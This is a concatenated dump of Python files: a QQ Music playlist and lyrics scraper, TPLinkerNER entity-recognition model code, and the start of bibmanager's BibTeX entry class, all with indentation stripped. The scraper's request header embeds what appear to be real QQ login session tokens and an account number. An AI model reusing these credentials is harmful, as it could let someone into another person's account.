html_text = requests_dora.try_best_2_get(url=url, params=paramter, headers=header).text
res = json.loads(html_text.lstrip("getPlaylist(").rstrip(")"))["data"]["list"]
album_list = []
for t_item in res:
album = {}
ILLEGAL_CHARACTERS_RE = re.compile(r"[\000-\010]|[\013-\014]|[\016-\037]")#用于去掉非法字符
album["createtime"] = t_item["createtime"]
album["creator_qq"] = t_item["creator"]["qq"]
album["creator_name"] = t_item["creator"]["name"]
album["creator_name"] = ILLEGAL_CHARACTERS_RE.sub(r"", album["creator_name"])
album["creator_isVip"] = t_item["creator"]["isVip"]
album["dissid"] = t_item["dissid"] #提取歌单id,用于后续提取歌曲id
album["dissname"] = t_item["dissname"] #歌单名称
album["dissname"] = ILLEGAL_CHARACTERS_RE.sub(r"", album["dissname"])
album["listennum"] = t_item["listennum"] #播放量
album_list.append(album)
return album_list
#爬取歌曲id
def get_song_list(dissid):
url = "https://c.y.qq.com/qzone/fcg-bin/fcg_ucc_getcdinfo_byids_cp.fcg"
header = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"cookie": "RK=7dNm4/X + Yj; tvfe_boss_uuid=bf00ee54e9081ab4; pgv_pvi=8772238336; pac_uid=1_857193777; pgv_pvid=6457341280; o_cookie=857193777; ptcz=c761e59c8c8d6bd5198866d02a5cb7313af1af468006c455d6c2b5d26201d42e; pgv_si=s10759168; _qpsvr_localtk=0.08285763449905015; ptisp=ctc; luin=o0857193777; lskey=<KEY>; pt2gguin=o0857193777; uin=o0857193777; skey=@Kydi7w0EI; p_uin=o0857193777; p_skey=HjsE9sEjznJfXk*9KFEeW4VZr6i3*tlXZ2nuzEw8kCg_; pt4_token=c-p6sv3JEboA51cSQ3ABqxM8O80Jct3jYYkgy-aEQuE_; p_luin=o0857193777; p_lskey=000400008f9c296cd10c03a5173d22a184aad124d791568e90e4198beb8ad699a4d02fbfc059f71ab3d8758c; ts_last=y.qq.com/portal/playlist.html; ts_refer=ui.ptlogin2.qq.com/cgi-bin/login; ts_uid=3392060960",
"referer": "https://y.qq.com/n/yqq/playlist/{}.html".format(dissid)
}
paramters = {
"type": "1",
"json": "1",
"utf8": "1",
"onlysong": "0",
"disstid": dissid,
"format": "jsonp",
"g_tk": "1089387893",
"jsonpCallback": "playlistinfoCallback",
"loginUin": "857193777",
"hostUin": "0",
"inCharset": "utf8",
"outCharset": "utf-8",
"notice": 0,
"platform": "yqq",
"needNewCode": 0
}
html_text = requests_dora.try_best_2_get(url=url, params=paramters, headers=header).text
cdlist = json.loads(html_text.lstrip("playlistinfoCallback(").rstrip(")"))["cdlist"]
if len(cdlist) >= 1:
cdlist = cdlist[0]
song_list = []
tags = ", ".join([i["name"] for i in cdlist["tags"]])
for item in cdlist["songlist"]:
song = {}
# if "size128" in item:
# song["size128"] = item["size128"]
if "songmid" in item:
song["songmid"] = item["songmid"]
else:
continue
if "songid" in item:
song["songid"] = item["songid"]
else:
continue
song["albumname"] = item["albumname"]
song["songname"] = item["songname"]
song["singer"] = ", ".join([i["name"] for i in item["singer"]])
song["tags"] = tags
song_list.append(song)
return song_list
def get_lyric(song):
songid = song["songid"]
songmid = song["songmid"]
url = "https://c.y.qq.com/lyric/fcgi-bin/fcg_query_lyric.fcg"
header = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"referer": "https://y.qq.com/n/yqq/song/{}.html".format(songmid)
}
paramters = {
"nobase64": 1,
"musicid": songid,
"callback": "jsonp1",
"g_tk": "1134533366",
"jsonpCallback": "jsonp1",
"loginUin": "0",
"hostUin": "0",
"format": "jsonp",
"inCharset": "utf8",
"outCharset": "utf-8",
"notice": "0",
"platform": "yqq",
"needNewCode": "0"
}
html_text = requests_dora.try_best_2_get(url=url, params=paramters, headers=header).text
res = json.loads(html_text.lstrip("jsonp1(").rstrip(")"))
# if "lyric" in res:
# lyric = res["lyric"]
# # decode
# lyric = html.unescape(lyric)
# lyric = html.unescape(lyric)
# lyric = parse.unquote(lyric)
#
# it = re.finditer(r"\[(.*?)\](.+)", lyric)
# lyric_lines = []
# for match in it:
# time_pop_up = match.group(1)
# time_split = time_pop_up.split(".")
# ms = float("0.{}".format(time_split[1]))
# sec = time.strptime(time_split[0], "%M:%S").tm_sec
# line = match.group(2)
# line = line.strip()
# if re.search("[::]", line) or line == "" or line == "此歌曲为没有填词的纯音乐,请您欣赏":
# continue
# lyric_lines.append({
# "time": sec + ms,
# "line": line,
# })
#
# return lyric_lines[1:]
# else:
# return []
if "lyric" in res:
lyric = res["lyric"]
if "此歌曲为没有填词的纯音乐,请您欣赏" in lyric:
return {}, []
# decode
lyric = html.unescape(lyric)
lyric = html.unescape(lyric)
lyric = parse.unquote(lyric)
it = re.finditer(r"\[(\d+):(\d+.\d+)\](.+)", lyric)
lyric_lines = []
contributors_dict = {}
for match in it:
min = float(match.group(1))
try:
sec = float(match.group(2))
except ValueError:
sec = 0
line = match.group(3)
line = line.strip()
if line == "":
continue
se_contributors = re.search("(.*?)[::](.*)", line)
if se_contributors:
contributors_dict[se_contributors.group(1).strip()] = se_contributors.group(2).strip()
continue
lyric_lines.append({
"time": min * 60 + sec,
"line": line,
})
return contributors_dict, lyric_lines[1:]
else:
return {}, []
def get_detail(song):
songid = song["songid"]
songmid = song["songmid"]
url = "https://c.y.qq.com/v8/fcg-bin/fcg_play_single_song.fcg"
header = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"referer": "https://y.qq.com/n/yqq/song/{}.html".format(songid)
}
paramters = {
"songmid": songmid,
"tpl": "yqq_song_detail",
"format": "jsonp",
"callback": "getOneSongInfoCallback",
"g_tk": "1134533366",
"jsonpCallback": "getOneSongInfoCallback",
"loginUin": "0",
"hostUin": "0",
"inCharset": "utf8",
"outCharset": "utf-8",
"notice": 0,
"platform": "yqq",
"needNewCode": 0
}
html_text = requests_dora.try_best_2_get(url=url, params=paramters, headers=header, verify=True).text
detail = json.loads(html_text.lstrip("getOneSongInfoCallback(").rstrip(")"))["data"]
song = {}
if len(detail) > 0:
detail = detail[0]
song["subtitle"] = detail["subtitle"]
song["title"] = detail["title"]
song["time_public"] = detail["time_public"]
try:
song["url"] = json.loads(html_text.lstrip("getOneSongInfoCallback(").rstrip(")"))["url"][str(songid)]
except:
song["url"] = ""
return song
if __name__ == "__main__":
save_path = "./qq_music_songs_by_album"
if not os.path.exists(save_path):
os.makedirs(save_path)
for sin in range(0, 7050, 30):
ein = sin + 29
album_list = get_album_list(sin, ein) # get 30 albums
for album in album_list:
dissname = album["dissname"]
song_list = get_song_list(album["dissid"])
chunk = []
for song in tqdm(song_list, desc = "getting songs in {}".format(dissname)):
contributors, lyric = get_lyric(song)
song["lyric"] = lyric
chunk.append(song)
json.dump(chunk, open("{}/lyric_{}.json".format(save_path, dissname), "w", encoding = "utf-8"), ensure_ascii = False)
``` |
{
"source": "131250208/TPLinkerNER",
"score": 2
} |
#### File: yucheng_ner/mrc_tplinker_ner/mrc_tplinker_ner.py
```python
import re
from tqdm import tqdm
import torch
from IPython.core.debugger import set_trace
import copy
import torch
import torch.nn as nn
import json
from ner_common.components import HandshakingKernel
from torch.nn.parameter import Parameter
class HandshakingTaggingScheme:
def __init__(self, types, max_seq_len_t1, visual_field):
'''
max_seq_len_t1: max sequence length of text 1
visual_field: how many tokens afterwards need to be taken into consider
'''
super().__init__()
self.visual_field = visual_field
self.types = set(types)
# mapping shaking sequence and matrix
self.matrix_size = max_seq_len_t1
# e.g. [(0, 0), (0, 1), (0, 2), (1, 1), (1, 2), (2, 2)]
self.shaking_idx2matrix_idx = [(ind, end_ind) for ind in range(self.matrix_size) for end_ind in list(range(self.matrix_size))[ind:ind + visual_field]]
self.matrix_idx2shaking_idx = [[0 for i in range(self.matrix_size)] for j in range(self.matrix_size)]
for shaking_idx, matrix_idx in enumerate(self.shaking_idx2matrix_idx):
self.matrix_idx2shaking_idx[matrix_idx[0]][matrix_idx[1]] = shaking_idx
def get_spots(self, sample):
'''
type2spots: a dict mapping type to spots
spot: (start_pos, end_pos - 1), points in the shaking matrix
'''
type2spots = {t: [] for t in self.types}
for ent in sample["entity_list"]:
t = ent["type"]
spot = (ent["tok_span"][0], ent["tok_span"][1] - 1)
type2spots[t].append(spot) # term["tok_span"][1] - 1: span[1] is not included
return type2spots
def spots2shaking_tag4batch(self, spots_batch):
'''
convert spots to shaking tag
spots_batch:
[spots1, spots2, ....]
spots: [(start_pos, end_pos), ]
return: shaking tag
'''
shaking_seq_len = self.matrix_size * self.visual_field - self.visual_field * (self.visual_field - 1) // 2
# set_trace()
shaking_seq_tag = torch.zeros([len(spots_batch), shaking_seq_len]).long()
for batch_idx, spots in enumerate(spots_batch):
for sp in spots:
shaking_ind = self.matrix_idx2shaking_idx[sp[0]][sp[1]]
shaking_seq_tag[batch_idx][shaking_ind] = 1
return shaking_seq_tag
def get_spots_fr_shaking_tag(self, shaking_tag):
'''
shaking_tag: (shaking_seq_len, )
return matrix_spots: [(start_pos, end_pos), ]
'''
matrix_spots = []
for point in shaking_tag.nonzero():
shaking_idx = point[0].item()
matrix_points = self.shaking_idx2matrix_idx[shaking_idx]
spot = (matrix_points[0], matrix_points[1])
matrix_spots.append(spot)
return matrix_spots
def decode_ent(self, question, text, shaking_tag, tok2char_span, tok_offset = 0, char_offset = 0):
'''
shaking_tag: size = (shaking_seq_len, tag_size)
if text is a subtext of test data, tok_offset and char_offset must be set
'''
matrix_spots = self.get_spots_fr_shaking_tag(shaking_tag)
entities = []
entity_memory_set = set()
type_ = re.match("Find (.*?) in the text.*", question).group(1)
for sp in matrix_spots:
char_spans = tok2char_span[sp[0]:sp[1] + 1]
char_sp = [char_spans[0][0], char_spans[-1][1]]
ent = text[char_sp[0]:char_sp[1]]
ent_memory = "{}\u2E80{}\u2E80{}".format(ent, *sp)
if ent_memory not in entity_memory_set:
entities.append({
"text": ent,
"tok_span": [sp[0] + tok_offset, sp[1] + 1 + tok_offset],
"char_span": [char_sp[0] + char_offset, char_sp[1] + char_offset],
"type": type_,
})
entity_memory_set.add(ent_memory)
return entities
class DataMaker:
def __init__(self, handshaking_tagger, tokenizer):
super().__init__()
self.handshaking_tagger = handshaking_tagger
self.tokenizer = tokenizer
def get_indexed_data(self, data, max_seq_len, type2questions, data_type = "train"):
indexed_samples = []
for sample in tqdm(data, desc = "Generate indexed data"):
text = sample["text"]
# get spots
type2spots = None
if data_type != "test":
type2spots = self.handshaking_tagger.get_spots(sample)
for type_, questions in type2questions.items():
for question in questions:
# codes for bert input
question = "Find {} in the text, {}".format(type_, question)
text_n_question = "{}[SEP]{}".format(text, question)
codes = self.tokenizer.encode_plus(text_n_question,
return_offsets_mapping = True,
add_special_tokens = False,
max_length = max_seq_len,
truncation = True,
pad_to_max_length = True)
# get codes
input_ids = torch.tensor(codes["input_ids"]).long()
attention_mask = torch.tensor(codes["attention_mask"]).long()
token_type_ids = torch.tensor(codes["token_type_ids"]).long()
offset_map = codes["offset_mapping"]
# spots
matrix_spots = type2spots[type_]
sub_sample = copy.deepcopy(sample)
sub_sample["entity_list"] = [ent for ent in sample["entity_list"] if ent["type"] == type_]
sub_sample["question"] = question
sample_tp = (sub_sample,
input_ids,
attention_mask,
token_type_ids,
offset_map,
matrix_spots,
)
indexed_samples.append(sample_tp)
return indexed_samples
def generate_batch(self, batch_data, data_type = "train"):
sample_list = []
input_ids_list = []
attention_mask_list = []
token_type_ids_list = []
offset_map_list = []
matrix_spots_batch = []
for tp in batch_data:
sample_list.append(tp[0])
input_ids_list.append(tp[1])
attention_mask_list.append(tp[2])
token_type_ids_list.append(tp[3])
offset_map_list.append(tp[4])
if data_type != "test":
matrix_spots_batch.append(tp[5])
batch_input_ids = torch.stack(input_ids_list, dim = 0)
batch_attention_mask = torch.stack(attention_mask_list, dim = 0)
batch_token_type_ids = torch.stack(token_type_ids_list, dim = 0)
batch_shaking_tag = None
if data_type != "test":
batch_shaking_tag = self.handshaking_tagger.spots2shaking_tag4batch(matrix_spots_batch)
return sample_list, batch_input_ids, batch_attention_mask, batch_token_type_ids, offset_map_list, batch_shaking_tag
class MRCTPLinkerNER(nn.Module):
def __init__(self,
encoder,
fake_input,
shaking_type,
pooling_type,
visual_field):
super().__init__()
self.encoder = encoder
shaking_hidden_size = encoder.config.hidden_size
self.fc = nn.Linear(shaking_hidden_size, 2)
# handshaking kernel
self.handshaking_kernel = HandshakingKernel(visual_field, fake_input, shaking_type, pooling_type)
def forward(self, input_ids, attention_mask, token_type_ids, max_seq_len_t1):
'''
max_seq_len_t1: max sequence lenght of text 1
'''
# input_ids, attention_mask, token_type_ids: (batch_size, seq_len)
# set_trace()
context_outputs = self.encoder(input_ids, attention_mask, token_type_ids)
# last_hidden_state: (batch_size, seq_len, hidden_size)
last_hidden_state = context_outputs[0]
# shaking_hiddens: (batch_size, shaking_seq_len, hidden_size)
# shaking_seq_len: max_seq_len_t1 * vf - sum(1, vf)
shaking_hiddens = self.handshaking_kernel(last_hidden_state[:, :max_seq_len_t1, :]) # only consider text 1, let alone the question
# ent_shaking_outputs: (batch_size, shaking_seq_len, entity_type_num)
ent_shaking_outputs = self.fc(shaking_hiddens)
return ent_shaking_outputs
class Metrics:
def __init__(self, handshaking_tagger):
super().__init__()
self.handshaking_tagger = handshaking_tagger
def get_sample_accuracy(self, pred, truth):
'''
tag全等正确率
'''
# (batch_size, ..., seq_len) -> (batch_size, -1)
pred = pred.view(pred.size()[0], -1)
truth = truth.view(truth.size()[0], -1)
# (batch_size, ),每个元素是pred与truth之间tag相同的数量
correct_tag_num = torch.sum(torch.eq(truth, pred).float(), dim = 1)
# seq维上所有tag必须正确,所以correct_tag_num必须等于seq的长度才算一个correct的sample
sample_acc_ = torch.eq(correct_tag_num, torch.ones_like(correct_tag_num) * truth.size()[-1]).float()
sample_acc = torch.mean(sample_acc_, axis=0)
return sample_acc
def get_ent_correct_pred_glod_num(self, gold_sample_list,
offset_map_list,
batch_pred_ent_shaking_seq_tag):
correct_num, pred_num, gold_num = 0, 0, 0
for ind in range(len(gold_sample_list)):
gold_sample = gold_sample_list[ind]
question = gold_sample["question"]
text = gold_sample["text"]
offset_map = offset_map_list[ind]
pred_ent_shaking_seq_tag = batch_pred_ent_shaking_seq_tag[ind]
pred_entities = self.handshaking_tagger.decode_ent(question, text, pred_ent_shaking_seq_tag, offset_map)
gold_entities = gold_sample["entity_list"]
pred_num += len(pred_entities)
gold_num += len(gold_entities)
memory_set = set()
for ent in gold_entities:
memory_set.add("{}\u2E80{}\u2E80{}".format(ent["tok_span"][0], ent["tok_span"][1], ent["type"]))
for ent in pred_entities:
hit = "{}\u2E80{}\u2E80{}".format(ent["tok_span"][0], ent["tok_span"][1], ent["type"])
if hit in memory_set:
correct_num += 1
return correct_num, pred_num, gold_num
def get_scores(self, correct_num, pred_num, gold_num):
minimini = 1e-10
precision = correct_num / (pred_num + minimini)
recall = correct_num / (gold_num + minimini)
f1 = 2 * precision * recall / (precision + recall + minimini)
return precision, recall, f1
```
#### File: yucheng_ner/ner_common/utils.py
```python
import re
from tqdm import tqdm
from IPython.core.debugger import set_trace
import copy
from transformers import BertTokenizerFast
import torch
class WordTokenizer:
def __init__(self, word2idx = None):
self.word2idx = word2idx
def tokenize(self, text):
return text.split(" ")
def text2word_indices(self, text, max_length = -1):
if not self.word2idx:
raise ValueError("if you invoke text2word_indices, self.word2idx should be set when initialize WordTokenizer")
word_ids = []
words = text.split(" ")
for w in words:
if w not in self.word2idx:
word_ids.append(self.word2idx['<UNK>'])
else:
word_ids.append(self.word2idx[w])
if len(word_ids) < max_length:
word_ids.extend([self.word2idx['<PAD>']] * (max_length - len(word_ids)))
if max_length != -1:
word_ids = torch.tensor(word_ids[:max_length]).long()
return word_ids
def get_word2char_span_map(self, text, max_length = -1):
words = self.tokenize(text)
word2char_span = []
char_num = 0
for wd in words:
word2char_span.append([char_num, char_num + len(wd)])
char_num += len(wd) + 1 # +1: whitespace
if len(word2char_span) < max_length:
word2char_span.extend([[0, 0]] * (max_length - len(word2char_span)))
if max_length != -1:
word2char_span = word2char_span[:max_length]
return word2char_span
def encode_plus(self, text, max_length = -1):
return {
"input_ids": self.text2word_indices(text, max_length),
"offset_mapping": self.get_word2char_span_map(text, max_length)
}
class Preprocessor:
def __init__(self, tokenizer, for_bert):
'''
if token_type == "subword", tokenizer must be set to bert encoder
"word", word tokenizer
'''
self.for_bert = for_bert
if for_bert:
self.tokenize = tokenizer.tokenize
self.get_tok2char_span_map = lambda text: tokenizer.encode_plus(text,
return_offsets_mapping = True,
add_special_tokens = False)["offset_mapping"]
else:
self.tokenize = tokenizer.tokenize
self.get_tok2char_span_map = lambda text: tokenizer.get_word2char_span_map(text)
def clean_data_wo_span(self, ori_data, separate = False, data_type = "train"):
'''
rm duplicate whitespaces
and separate special characters from tokens
'''
def clean_text(text):
text = re.sub("\s+", " ", text).strip()
if separate:
text = re.sub("([^A-Za-z0-9])", r" \1 ", text)
text = re.sub("\s+", " ", text).strip()
return text
for sample in tqdm(ori_data, desc = "clean data wo span"):
sample["text"] = clean_text(sample["text"])
if data_type == "test":
continue
for ent in sample["entity_list"]:
ent["text"] = clean_text(ent["text"])
return ori_data
def clean_data_w_span(self, ori_data):
'''
add a stake to bad samples and remove them from the clean data
'''
def strip_white(entity, entity_char_span):
p = 0
while entity[p] == " ":
entity_char_span[0] += 1
p += 1
p = len(entity) - 1
while entity[p] == " ":
entity_char_span[1] -= 1
p -= 1
return entity.strip(), entity_char_span
bad_samples, clean_data = [], []
for sample in tqdm(ori_data, desc = "clean data w span"):
text = sample["text"]
bad = False
for ent in sample["entity_list"]:
# rm whitespaces
ent["text"], ent["char_span"] = strip_white(ent["text"], ent["char_span"])
char_span = ent["char_span"]
if ent["text"] not in text or ent["text"] != text[char_span[0]:char_span[1]]:
ent["stake"] = 0
bad = True
if bad:
bad_samples.append(copy.deepcopy(sample))
new_ent_list = [ent for ent in sample["entity_list"] if "stake" not in ent]
if len(new_ent_list) > 0:
sample["entity_list"] = new_ent_list
clean_data.append(sample)
return clean_data, bad_samples
def _get_char2tok_span(self, text):
'''
map character level span to token level span
'''
tok2char_span = self.get_tok2char_span_map(text)
# get the number of characters
char_num = None
for tok_ind in range(len(tok2char_span) - 1, -1, -1):
if tok2char_span[tok_ind][1] != 0:
char_num = tok2char_span[tok_ind][1]
break
# build a map: char index to token level span
char2tok_span = [[-1, -1] for _ in range(char_num)] # 除了空格,其他字符均有对应token
for tok_ind, char_sp in enumerate(tok2char_span):
for char_ind in range(char_sp[0], char_sp[1]):
tok_sp = char2tok_span[char_ind]
# 因为char to tok 也可能出现1对多的情况,比如韩文。所以char_span的pos1以第一个tok_ind为准,pos2以最后一个tok_ind为准
if tok_sp[0] == -1:
tok_sp[0] = tok_ind
tok_sp[1] = tok_ind + 1
return char2tok_span
def _get_ent2char_spans(self, text, entities, ignore_subword = True):
'''
map entity to all possible character spans
e.g. {"entity1": [[0, 1], [18, 19]]}
if ignore_subword, look for entities with whitespace around, e.g. "entity" -> " entity "
'''
entities = sorted(entities, key = lambda x: len(x), reverse = True)
text_cp = " {} ".format(text) if ignore_subword else text
ent2char_spans = {}
for ent in entities:
spans = []
target_ent = " {} ".format(ent) if ignore_subword else ent
for m in re.finditer(re.escape(target_ent), text_cp):
span = [m.span()[0], m.span()[1] - 2] if ignore_subword else m.span()
spans.append(span)
# if len(spans) == 0:
# set_trace()
ent2char_spans[ent] = spans
return ent2char_spans
def add_char_span(self, dataset, ignore_subword = True):
samples_w_wrong_entity = [] # samples with entities that do not exist in the text, please check if any
for sample in tqdm(dataset, desc = "Adding char level spans"):
entities = [ent["text"] for ent in sample["entity_list"]]
ent2char_spans = self._get_ent2char_spans(sample["text"], entities, ignore_subword = ignore_subword)
# filter
ent_memory_set = set()
uni_entity_list = []
for ent in sample["entity_list"]:
ent_memory = "{}-{}".format(ent["text"], ent["type"])
if ent_memory not in ent_memory_set:
uni_entity_list.append(ent)
ent_memory_set.add(ent_memory)
new_ent_list = []
for ent in uni_entity_list:
ent_spans = ent2char_spans[ent["text"]]
for sp in ent_spans:
new_ent_list.append({
"text": ent["text"],
"type": ent["type"],
"char_span": sp,
})
if len(sample["entity_list"]) > len(new_ent_list):
samples_w_wrong_entity.append(sample)
sample["entity_list"] = new_ent_list
return dataset, samples_w_wrong_entity
def add_tok_span(self, data):
'''
data: char span is required
'''
for sample in tqdm(data, desc = "Adding token level span"):
text = sample["text"]
char2tok_span = self._get_char2tok_span(sample["text"])
for ent in sample["entity_list"]:
char_span = ent["char_span"]
tok_span_list = char2tok_span[char_span[0]:char_span[1]]
tok_span = [tok_span_list[0][0], tok_span_list[-1][1]]
ent["tok_span"] = tok_span
return data
def check_tok_span(self, data):
entities_to_fix = []
for sample in tqdm(data, desc = "check tok spans"):
text = sample["text"]
tok2char_span = self.get_tok2char_span_map(text)
for ent in sample["entity_list"]:
tok_span = ent["tok_span"]
char_span_list = tok2char_span[tok_span[0]:tok_span[1]]
char_span = [char_span_list[0][0], char_span_list[-1][1]]
text_extr = text[char_span[0]:char_span[1]]
gold_char_span = ent["char_span"]
if not(char_span[0] == gold_char_span[0] and char_span[1] == gold_char_span[1] and text_extr == ent["text"]):
bad_ent = copy.deepcopy(ent)
bad_ent["extr_text"] = text_extr
entities_to_fix.append(bad_ent)
span_error_memory = set()
for ent in entities_to_fix:
err_mem = "gold: {} --- extr: {}".format(ent["text"], ent["extr_text"])
span_error_memory.add(err_mem)
return span_error_memory
def split_into_short_samples(self,
sample_list,
max_seq_len,
sliding_len = 50,
data_type = "train"):
new_sample_list = []
for sample in tqdm(sample_list, desc = "Splitting"):
medline_id = sample["id"]
text = sample["text"]
tokens = self.tokenize(text)
tok2char_span = self.get_tok2char_span_map(text)
# sliding on token level
for start_ind in range(0, len(tokens), sliding_len):
if self.for_bert: # if use bert, do not split a word into two samples
while "##" in tokens[start_ind]:
start_ind -= 1
end_ind = start_ind + max_seq_len
tok_spans = tok2char_span[start_ind:end_ind]
char_span = (tok_spans[0][0], tok_spans[-1][-1])
sub_text = text[char_span[0]:char_span[1]]
if data_type == "test":
if len(sub_text) > 0:
new_sample = {
"id": medline_id,
"text": sub_text,
"tok_offset": start_ind,
"char_offset": char_span[0],
}
new_sample_list.append(new_sample)
else:
sub_entity_list = []
for term in sample["entity_list"]:
tok_span = term["tok_span"]
if tok_span[0] >= start_ind and tok_span[1] <= end_ind:
new_term = copy.deepcopy(term)
new_term["tok_span"] = [tok_span[0] - start_ind, tok_span[1] - start_ind]
new_term["char_span"][0] -= char_span[0]
new_term["char_span"][1] -= char_span[0]
sub_entity_list.append(new_term)
# if len(sub_entity_list) > 0:
new_sample = {
"id": medline_id,
"text": sub_text,
"entity_list": sub_entity_list,
}
new_sample_list.append(new_sample)
if end_ind > len(tokens):
break
return new_sample_list
``` |
{
"source": "1313e/bibmanager",
"score": 2
} |
#### File: bibmanager/bib_manager/bib_manager.py
```python
__all__ = [
'Bib',
'display_bibs',
'remove_duplicates',
'filter_field',
'loadfile',
'save',
'load',
'export',
'merge',
'init',
'add_entries',
'edit',
'search',
]
import os
import sys
import shutil
import datetime
import re
import pickle
import urllib
import subprocess
import numpy as np
import prompt_toolkit
from prompt_toolkit.formatted_text import PygmentsTokens
from prompt_toolkit import print_formatted_text
import pygments
from pygments.token import Token
from pygments.lexers.bibtex import BibTeXLexer
from .. import config_manager as cm
from .. import utils as u
# Some constant definitions:
lexer = prompt_toolkit.lexers.PygmentsLexer(BibTeXLexer)
months = {"jan":1, "feb":2, "mar":3, "apr": 4, "may": 5, "jun":6,
"jul":7, "aug":8, "sep":9, "oct":10, "nov":11, "dec":12}
class Bib(object):
"""
Bibliographic-entry object.
"""
def __init__(self, entry):
"""
Create a Bib() object from given entry. Minimally, entries must
contain the author, title, and year keys.
Parameters
----------
entry: String
A bibliographic entry text.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> from bibmanager.utils import Author
>>> entry = '''@Misc{JonesEtal2001scipy,
author = {<NAME> and <NAME> and <NAME>},
title = {{SciPy}: Open source scientific tools for {Python}},
year = {2001},
}'''
>>> bib = bm.Bib(entry)
>>> print(bib.title)
SciPy: Open source scientific tools for Python
>>> for author in bib.authors:
>>> print(author)
Author(last='Jones', first='Eric', von='', jr='')
Author(last='Oliphant', first='Travis', von='', jr='')
Author(last='Peterson', first='Pearu', von='', jr='')
>>> print(bib.sort_author)
Sort_author(last='jones', first='e', von='', jr='', year=2001, month=13)
"""
if u.count(entry) != 0:
raise ValueError("Mismatched braces in entry.")
self.content = entry
# Defaults:
self.month = 13
self.adsurl = None
self.bibcode = None
self.doi = None
self.eprint = None
self.isbn = None
fields = u.get_fields(self.content)
self.key = next(fields)
for key, value, nested in fields:
if key == "title":
# Title with no braces, tabs, nor linebreak and corrected blanks:
self.title = " ".join(re.sub("({|})", "", value).split())
elif key == "author":
# Parse authors finding all non-brace-nested 'and' instances:
authors, nests = u.cond_split(value.replace("\n"," "), " and ",
nested=nested, ret_nests=True)
self.authors = [u.parse_name(author, nested)
for author,nested in zip(authors,nests)]
elif key == "year":
r = re.search('[0-9]{4}', value)
self.year = int(r.group(0))
elif key == "month":
value = value.lower().strip()
self.month = months[value[0:3]]
elif key == "doi":
self.doi = value
elif key == "adsurl":
self.adsurl = value
# Get bibcode from adsurl, un-code UTF-8, and remove backslashes:
bibcode = os.path.split(value)[1].replace('\\', '')
self.bibcode = urllib.parse.unquote(bibcode)
elif key == "eprint":
self.eprint = value.replace('arXiv:','').replace('astro-ph/','')
elif key == "isbn":
self.isbn = value.lower().strip()
for attr in ['authors', 'title', 'year']:
if not hasattr(self, attr):
raise ValueError(f"Bibtex entry '{self.key}' is missing author, "
"title, or year.")
# First-author fields used for sorting:
# Note this differs from Author[0], since fields are 'purified',
# and 'first' goes only by initials().
self.sort_author = u.Sort_author(u.purify(self.authors[0].last),
u.initials(self.authors[0].first),
u.purify(self.authors[0].von),
u.purify(self.authors[0].jr),
self.year,
self.month)
def update_key(self, new_key):
"""Update key with new_key, making sure to also update content."""
self.content = self.content.replace(self.key, new_key, 1)
self.key = new_key
def __repr__(self):
return self.content
def __contains__(self, author):
r"""
Check if given author is in the author list of this bib entry.
If the 'author' string begins with the '^' character, match
only against the first author.
Parameters
----------
author: String
An author name in a valid BibTeX format.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> bib = bm.Bib('''@ARTICLE{DoeEtal2020,
author = {{<NAME>. and {<NAME>. and {Dupont}, J.},
title = "What Have the Astromomers ever Done for Us?",
journal = {\apj},
year = 2020,}''')
>>> # Check for first author:
>>> '<NAME>' in bib
True
>>> # Format doesn't matter, as long as it is a valid format:
>>> '<NAME>' in bib
True
>>> # Neglecting first's initials still match:
>>> 'Doe' in bib
True
>>> # But, non-matching initials wont match:
>>> '<NAME>.' in bib
False
>>> # Match against first author only if string begins with '^':
>>> '^Doe' in bib
True
>>> '^Perez' in bib
False
"""
# Check first-author mark:
if author[0:1] == '^':
author = author[1:]
authors = [self.authors[0]]
else:
authors = self.authors
# Parse and purify input author name:
author = u.parse_name(author)
first = u.initials(author.first)
von = u.purify(author.von)
last = u.purify(author.last)
jr = u.purify(author.jr)
# Remove non-matching authors by each non-empty field:
if len(jr) > 0:
authors = [author for author in authors if jr == u.purify(author.jr)]
if len(von) > 0:
authors = [author for author in authors
if von == u.purify(author.von)]
if len(first) > 0:
authors = [author for author in authors
if first == u.initials(author.first)[0:len(first)]]
authors = [author for author in authors if last == u.purify(author.last)]
return len(authors) >= 1
# https://docs.python.org/3.6/library/stdtypes.html
def __lt__(self, other):
"""
Evaluate sequentially according to sort_author's fields: last,
first, von, and jr, year, and month. If any of these
fields are equal, go on to next field to compare.
"""
s, o = self.sort_author, other.sort_author
if s.last != o.last:
return s.last < o.last
if len(s.first)==1 or len(o.first) == 1:
if s.first[0:1] != o.first[0:1]:
return s.first < o.first
else:
if s.first != o.first:
return s.first < o.first
if s.von != o.von:
return s.von < o.von
if s.jr != o.jr:
return s.jr < o.jr
if s.year != o.year:
return s.year < o.year
return s.month < o.month
def __eq__(self, other):
"""
Check whether self and other have same sort_author (first author)
and year/month.
Evaluate to equal by first initial if one entry has less initials
than the other.
"""
if len(self.sort_author.first)==1 or len(other.sort_author.first)==1:
first = self.sort_author.first[0:1] == other.sort_author.first[0:1]
else:
first = self.sort_author.first == other.sort_author.first
return (self.sort_author.last == other.sort_author.last
and first
and self.sort_author.von == other.sort_author.von
and self.sort_author.jr == other.sort_author.jr
and self.sort_author.year == other.sort_author.year
and self.sort_author.month == other.sort_author.month)
def __le__(self, other):
return self.__lt__(other) or self.__eq__(other)
def published(self):
"""
Published status according to the ADS bibcode field:
Return -1 if bibcode is None.
Return 0 if bibcode is arXiv.
Return 1 if bibcode is peer-reviewed journal.
"""
if self.bibcode is None:
return -1
return int(self.bibcode.find('arXiv') < 0)
def get_authors(self, short=True):
"""
wrapper for string representation for the author list.
See bib_manager.get_authors() for docstring.
"""
return u.get_authors(self.authors, short)
def display_bibs(labels, bibs):
r"""
Display a list of bib entries on screen with flying colors.
Parameters
----------
labels: List of Strings
Header labels to show above each Bib() entry.
bibs: List of Bib() objects
BibTeX entries to display.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> e1 = '''@Misc{JonesEtal2001scipy,
author = {<NAME> and <NAME> and <NAME>},
title = {{SciPy}: Open source scientific tools for {Python}},
year = {2001},
}'''
>>> e2 = '''@Misc{Jones2001,
